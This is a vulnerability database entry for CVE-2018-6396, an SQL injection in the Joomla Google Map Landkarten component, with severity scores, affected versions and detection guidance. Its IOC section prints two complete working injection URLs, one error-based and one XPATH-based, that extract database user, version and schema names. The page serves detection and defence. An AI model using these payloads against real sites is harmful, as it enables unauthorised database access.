cbcvebase.
CVE-2018-6396
published 2018-02-17

CVE-2018-6396: SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map…

PriorityP271critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
23.97%
97.6th percentile
SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action.

Affected

1 ranges
VendorProductVersion rangeFixed in
google_map_landkarten_projectgoogle_map_landkarten<= 4.2.3

Detection & IOCsextracted from sources · hover to see the quote

urlindex.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1' AND (SELECT 6142 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e,(SELECT (ELT(6142=6142,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ptYA&id=1&format=raw
urlindex.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1+AND+EXTRACTVALUE(4855,CONCAT(0x5c,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),(SELECT+(ELT(4855=4855,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))&format=raw
otheroption=com_gmap
  • Detect SQLi attempts against the com_gmap Joomla component by monitoring requests containing 'option=com_gmap' combined with 'layout=form_markers' and SQL payloads in the 'cid' or 'id' parameters (e.g. single-quote, AND, SELECT, EXTRACTVALUE, CONCAT keywords).
  • Also monitor requests with 'option=com_gmap' and 'layout=default' for SQL injection payloads in the 'map' parameter.
  • Error-based SQLi technique observed: FLOOR(RAND(0)*2) with GROUP BY on INFORMATION_SCHEMA.PLUGINS triggers a '1062 Duplicate entry' MySQL error — monitor web server/application logs for this error string as evidence of successful exploitation.
  • XPATH error-based SQLi technique observed: EXTRACTVALUE() with CONCAT(0x5c,...) triggers a '1105 XPATH syntax error' — monitor application/DB logs for this error string as evidence of active exploitation.
  • The exploit uses 'view=gm_markers&tmpl=component&format=raw' in the request — this combination is specific to the vulnerable code path and can be used as a high-fidelity filter in WAF or SIEM rules.
  • ·The exploit URLs use 'localhost' as the target host — in real-world detections, replace with the actual target hostname/IP. The SQL payloads and parameter names (cid, id, map) are the stable, host-independent indicators.
  • ·Vulnerability affects Google Map Landkarten versions up to and including 4.2.3 for Joomla!. Installations running version 4.2.3 or earlier should be treated as unpatched.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.